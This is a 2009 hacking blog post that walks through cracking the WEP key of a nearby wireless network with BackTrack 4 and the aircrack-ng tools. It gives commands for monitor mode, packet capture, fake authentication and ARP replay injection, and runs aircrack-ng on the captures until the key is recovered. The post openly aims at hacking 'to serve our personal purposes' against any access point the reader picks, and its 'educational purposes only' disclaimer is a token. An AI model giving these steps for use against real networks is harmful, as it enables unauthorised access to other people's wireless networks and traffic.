Thursday, December 31, 2009


Welcome to the Art of hacking blog.

In here we will be learning a few means of hacking to serve our personal Purpouses "Warning This Is For educational purposes only"

okay now lets start with hacking starting from setting up a connection with the internet

We will be learning how to Crack Wep Keys And Wpa-psk and Wpa2-psk Keys so be patient and get ready to rock!!


First of All Wep Keys.

Wep Keys can be cracked easily and without any effort as long as you're near to the AP (Acces Point)

First of all you've got to download Backtrack 4 which is a live linux distribution having alot of tools that can serve our needs (Ps: Check at aircrack-ng.org if you're wireless card can go in monitoring mode if not then you cant do this operation)

You can download Backtrack 4 from
Here now its around 1.3 Gbs so dont get Shocked.
after it downloads get an empty Dvd disk and burn the iso to it "If you're burning with nero make it a bootable disk"
now reboot your computer (If you didnt make it a bootable disk find someway to make the Cd-rom the first to boot upon your pc) (Normally by pressing F8 and find it somewhere)
now you're doing great when bt4 cd loads you will find multiple choices just pick No.1
now it will load then you will see something like "root@bt4:" now type "Startx"
okay very good now listen carefully
wait a sec untill it loads then head to the start menu find "Services >> Networking >> Start"
now you can connect with your wireless network through Start menu >> Internet >> Wicd Manager

okay great now the fun begins

Open a new Shell "the small black box tool on the south west corner of the screen"
now you will see "root@bt:"
write airmon-ng start wlan0
wait a second
now you will see something written (monitoring mode enabled on ....")
maybe wlan0 or mon0 or ath0
depends on your card .
now write "airodump-ng "and the interface (mon0 or wlan0 or ath0)
now wait a minute it will show you all the surrounding networks now press "Control+Z" to stop the operation
copy the mac addresse of the AP you want (its in this form 00:11:22:33:44:55 numbers change with letters and other numbers)
also keep in mind the station number
alright now in the desk-top make a new document file save them in it
now back to the shell type
airodump-ng -c (channel no.) -w (file name to save it) --bssid (bssid of the channel or the mac address) the interface (wlan0 , mon0 , ath0)
now its capturing packets you will see the packets under the word "Data" keep watching them while doing the next steps
now open a new shell and type this
aireplay-ng -1 0 -a (bssid) -h 00:11:22:33:44:55 (wlan0 mon0 or ath0)
wait till it finish and do this
aireplay-ng -3 -b (bssid) -h 00:11:22:33:44:55 (wlan0 mon0 ath0)
now leave it working and get back to the first shell

open a new shell and keep watching for the data number every 5000 packets write in the new shell

Aircrack-ng (filename-01.cap) where the filename is the one you typed earlier

keep doing this over and over untill it will say
Key Decrypted Successfully [12:24:53:64:7:4:45:]
now remove the ":" and you will get the key use it to connect easily
later i will be posting how to crack Wpa-psk and wpa2-psk


No comments:

Post a Comment